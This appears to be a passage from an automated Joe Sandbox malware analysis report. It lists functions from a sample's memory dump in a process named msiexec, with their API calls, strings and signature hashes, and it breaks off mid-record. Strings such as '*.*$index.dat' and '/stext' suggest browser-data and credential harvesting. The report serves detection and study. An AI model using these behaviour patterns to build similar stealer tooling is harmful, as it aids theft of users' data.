                                                              • String ID: *.*$index.dat
                                                              • API String ID: 1974802433-2863569691
                                                              • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                              • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                              • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                              Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                              • GetLastError.KERNEL32 ref: 004175A2
                                                              • GetLastError.KERNEL32 ref: 004175A8
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                              • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                              • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                              Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                              • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                              • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$CloseCreateHandleTime
                                                              • String ID:
                                                              • API String ID: 3397143404-0
                                                              • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                              • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                              • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                              Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                              • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Temp$DirectoryFileNamePathWindows
                                                              • String ID:
                                                              • API String ID: 1125800050-0
                                                              • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                              • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                              • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                              Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNEL32(00000064), ref: 004175D0
                                                              • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CloseHandleSleep
                                                              • String ID: }A
                                                              • API String ID: 252777609-2138825249
                                                              • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                              • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                              • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                              Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • malloc.MSVCRT ref: 00409A10
                                                              • memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                              • free.MSVCRT ref: 00409A31
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: freemallocmemcpy
                                                              • String ID:
                                                              • API String ID: 3056473165-0
                                                              • Opcode ID: a991de929d336fb87ccd778b8aa331ddd4881c067aca3c757db3e3d2fcb11491
                                                              • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                              • Opcode Fuzzy Hash: a991de929d336fb87ccd778b8aa331ddd4881c067aca3c757db3e3d2fcb11491
                                                              • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                              Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: d
                                                              • API String ID: 0-2564639436
                                                              • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                              • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                              • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                              • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                              Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset
                                                              • String ID: BINARY
                                                              • API String ID: 2221118986-907554435
                                                              • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                              • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                              • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                              Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: /stext
                                                              • API String ID: 2081463915-3817206916
                                                              • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                              • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                              • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                              Function 00406B90 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 56COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: _wcsicmp
                                                              • String ID: .#v
                                                              • API String ID: 2081463915-507759092
                                                              • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                              • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                              Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                              • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                              • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                              • String ID:
                                                              • API String ID: 2445788494-0
                                                              • Opcode ID: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                              • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                              • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                              • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                              Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                              • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                              • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                              • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                              • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                              Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: malloc
                                                              • String ID: failed to allocate %u bytes of memory
                                                              • API String ID: 2803490479-1168259600
                                                              • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                              • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                              • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                              Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 0041BDDF
                                                              • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmpmemset
                                                              • String ID:
                                                              • API String ID: 1065087418-0
                                                              • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                              • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                              • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                              Function 004104FB Relevance: 2.6, APIs: 2, Instructions: 140COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                              • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                              • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                              • String ID:
                                                              • API String ID: 1381354015-0
                                                              • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                              • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                              • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                              Function 004300E8 Relevance: 2.6, APIs: 2, Instructions: 103COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 004301AD
                                                              • memcpy.MSVCRT(000001A8,?,00000020,?,00000000,00000000,00443DCE,00000000,00000000,00000000,?,00445FAE,?), ref: 004301CD
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpymemset
                                                              • String ID:
                                                              • API String ID: 1297977491-0
                                                              • Opcode ID: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                              • Instruction ID: 4c6ebae2fd17f46eb6a701b53e5b2159fa076c350f721ddb3a961165d25aeca7
                                                              • Opcode Fuzzy Hash: b6c8b344e63531bca6e6aefc5e8eb99709ec7ba8fcdd06e77ba93d6293000e49
                                                              • Instruction Fuzzy Hash: F331BE72A00214EBDF10DF59C881A9EB7B4EF48714F24959AE804AF242C775EE41CB98
                                                              Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                              • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$Time$CloseCompareCreateHandlememset
                                                              • String ID:
                                                              • API String ID: 2154303073-0
                                                              • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                              • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                              • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                              Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 3150196962-0
                                                              • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                              • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                              • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                              • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                              Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: File$PointerRead
                                                              • String ID:
                                                              • API String ID: 3154509469-0
                                                              • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                              • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                              • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                              Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$StringWrite_itowmemset
                                                              • String ID:
                                                              • API String ID: 4232544981-0
                                                              • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                              • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                              • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                              Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID:
                                                              • API String ID: 3664257935-0
                                                              • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                              • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                              • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                              Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                              • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$FileModuleName
                                                              • String ID:
                                                              • API String ID: 3859505661-0
                                                              • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                              • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                              • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                              Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                              Memory Dump Source
                                                              • Source File: 00000011.00000002.2923194087.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_17_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                              • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
